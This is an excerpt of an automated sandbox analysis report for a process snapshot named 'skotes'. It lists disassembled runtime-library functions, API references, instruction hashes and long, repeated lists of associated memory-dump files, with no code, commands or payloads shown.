                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                                                    • String ID: Zd,md
                                                                                                                                                                    • API String ID: 809856575-1215882471
                                                                                                                                                                    • Opcode ID: f7dba606252f05e964b6e3a7dcdd5863e543f3dcfd2ae6c8aec783c55079a755
                                                                                                                                                                    • Instruction ID: fa7b109b99c8f3167494000a953a19e8e2064d74ef65292bf0d3bbb03c6a8e83
                                                                                                                                                                    • Opcode Fuzzy Hash: f7dba606252f05e964b6e3a7dcdd5863e543f3dcfd2ae6c8aec783c55079a755
                                                                                                                                                                    • Instruction Fuzzy Hash: A431C17190021AAFDB209FA5CC41EEF7BAAEF41710F044128FC14A7251DB74CE51C7A4
                                                                                                                                                                    Function 00641704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00641764
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006417AF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                    • API String ID: 3390424672-2046700901
                                                                                                                                                                    • Opcode ID: f3c064b2c0a073f30a73a2128b46b367040640e680e6332da0743c18fb1ed84b
                                                                                                                                                                    • Instruction ID: 9e7c78dcff12842bae40a41dfee26d64c97f5899b913423407b4df852a5116a7
                                                                                                                                                                    • Opcode Fuzzy Hash: f3c064b2c0a073f30a73a2128b46b367040640e680e6332da0743c18fb1ed84b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F112935A002149BCF55EF18C4845AD77ABAF86360B154069EC029F342DB74ED81CBD0
                                                                                                                                                                    Function 00630C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00630CD7
                                                                                                                                                                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00630D2A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                                                    • String ID: p[g
                                                                                                                                                                    • API String ID: 3303180142-556384550
                                                                                                                                                                    • Opcode ID: 57c10221717760e2c71a8e208d04c078bdda9e8955dc410a509187049e2434fd
                                                                                                                                                                    • Instruction ID: a0dbb7669d01642e14f47ca39c975e37f4afb4c37be02c1155f4bf07bef4f152
                                                                                                                                                                    • Opcode Fuzzy Hash: 57c10221717760e2c71a8e208d04c078bdda9e8955dc410a509187049e2434fd
                                                                                                                                                                    • Instruction Fuzzy Hash: 10019230D056159AEB54EBF8697136D66E2AF08300F60449EF44AEB282CE708E498799
                                                                                                                                                                    Function 0062CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateSemaphoreExW.KERNEL32(?,006365E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0062CAFC
                                                                                                                                                                    • CreateSemaphoreW.KERNEL32(?,006365E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0062CB1E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateSemaphore
                                                                                                                                                                    • String ID: ec
                                                                                                                                                                    • API String ID: 1078844751-671103900
                                                                                                                                                                    • Opcode ID: 0930df64be0b702e898bf504900f30dfc8f8cedcce64c9a95f1d2051876d86de
                                                                                                                                                                    • Instruction ID: 584339964276ea77fe7fb49f806b09bb4715689080d61b6ace8dae6f3300cc2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 0930df64be0b702e898bf504900f30dfc8f8cedcce64c9a95f1d2051876d86de
                                                                                                                                                                    • Instruction Fuzzy Hash: 93F03436901528ABCF224F80EC148AE7F2BEF08B61B048020FD0966230C7B29C61EFD1
                                                                                                                                                                    Function 0063B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0063B94E
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0063B961
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
